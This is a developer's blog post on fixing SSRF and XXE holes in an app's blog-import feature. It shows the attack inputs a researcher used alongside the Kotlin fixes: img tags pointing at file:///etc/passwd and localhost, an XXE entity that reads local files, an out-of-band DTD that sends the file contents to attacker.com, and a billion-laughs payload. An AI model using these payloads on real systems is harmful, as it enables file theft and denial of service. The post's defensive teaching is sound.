Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications?

Hackers.

Every new feature is an additional opportunity, a potential new vulnerability.

Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive).

And on Monday I received this message:

Huge vuln on writizzy
Hello, You have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd Basically, you absolutely need to validate the images from the Medium HTML!
Your /etc/passwd as proof:
Micka

Since it's possible you might discover this kind of vulnerability, let me show you how to exploit SSRF and XXE vulnerabilities.

The SSRF Vulnerability

SSRF stands for "Server-Side Request Forgery" - an attack that allows access to vulnerable server resources.

But how do you access these resources by triggering a data import with a ZIP archive?

The import feature relies on an important principle: I try to download the images that are in the article to be migrated and import them to my own storage (Bunny in my case).

For example, imagine I have this in a Medium page:

html

<img src="https://cdn-images-1.medium.com/max/800/image.jpg"/>

I need to download the image, then re-upload it to Bunny. During the conversion to markdown, I'll then write this:

markdown

![](https://cdn.bunny.net/blog/12132132/image.jpg)

So to do this, at some point I open a URL to the image:

val imageBytes = try {
    val connection = URL(imageUrl).openConnection()
    connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
    connection.setRequestProperty("Referer", "https://medium.com/")
    connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
    connection.connectTimeout = 10000
    connection.readTimeout = 10000
    connection.getInputStream().use { it.readBytes() }
} catch (e: Exception) {
    logger.warn("Failed to download image $imageUrl: ${e.message}")
    return imageUrl
}

Then I upload the byte array to Bunny.

Okay. But what happens if the user writes this:

<img src="file:///etc/passwd">

The previous code will try to read the file following the requested protocol - in this case, file. Then upload the file content to the CDN. Content that's now publicly accessible.

And you can also access internal URLs to scan ports, get sensitive info, etc.:

<img src="http://localhost:6379/">

The vulnerability is quite serious.

To fix it, there are several things to do. First, verify the protocol used:

if (url.protocol !in listOf("http", "https")) {
    logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl")
    return imageUrl
}

Then, verify that we're not attacking private URLs:

val host = url.host.lowercase()
if (isPrivateOrLocalhost(host)) {
    logger.warn("Blocked private/localhost URL: $imageUrl")
    return imageUrl
}

...

private fun isPrivateOrLocalhost(host: String): Boolean {
    if (host in listOf("localhost", "127.0.0.1", "::1")) return true

    val address = try {
        java.net.InetAddress.getByName(host)
    } catch (_: Exception) {
        return true // When in doubt, block it
    }

    return address.isLoopbackAddress ||
            address.isLinkLocalAddress ||
            address.isSiteLocalAddress
}

But here, I still have a risk. The user can write:

<img src="https://hacker-domain.com/image.jpg">

And this could still be risky if the hacker requests a redirect from this URL to /etc/passwd.

So we need to block redirect requests:

val connection = url.openConnection()
if (connection is java.net.HttpURLConnection) {
    connection.instanceFollowRedirects = false
}
connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
connection.setRequestProperty("Referer", "https://medium.com/")
connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
connection.connectTimeout = 10000
connection.readTimeout = 10000
val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode

if (responseCode in listOf(301, 302, 303, 307, 308)) {
    logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)")
    return imageUrl
}

Be very careful with user-controlled connection opening.

Except it wasn't over.

Second message from Micka:

You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test to warn you at the same time as the other vuln, you need to fix this asap too :)

The XXE Vulnerability

XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to:

Read local files (/etc/passwd, config files, SSH keys...)
Perform SSRF (requests to internal services)
Perform DoS (billion laughs attack)

Micka modified the WordPress XML file to add an entity declaration:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
...
<content:encoded>&xxe;</content:encoded>

This directive asks the XML parser to go read the content of a local file to use it later.

It would also have been possible to send this file to a URL directly:

<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>

And on http://attacker.com/evil.dtd:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;

Finally, to crash a server, the attacker could also have done this:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<rss>
  <channel>
    <item>
      <title>&lol9;</title>
      <wp:post_id>1</wp:post_id>
      <wp:status>publish</wp:status>
      <wp:post_type>post</wp:post_type>
    </item>
  </channel>
</rss>

This requests the display of over 3 billion characters, crashing the server. There are variants, but you get the idea.

We definitely don't want any of this.

This time, we need to secure the XML parser by telling it not to look at external entities:

val factory = DocumentBuilderFactory.newInstance()

// Disable external entities (XXE protection)
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
factory.setFeature("http://xml.org/sax/features/external-general-entities", false)
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false)
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false)
factory.isXIncludeAware = false
factory.isExpandEntityReferences = false

I hope you learned something. I certainly did, because even though I should have caught the SSRF vulnerability, honestly, I would never have seen the one with the XML parser. It's thanks to Micka that I discovered this type of attack.

FYI, Micka is a wonderful person I've worked with before at Malt and who works in security. You may have run into him at capture the flag events at Mixit. And he loves trying to find this kind of vulnerability.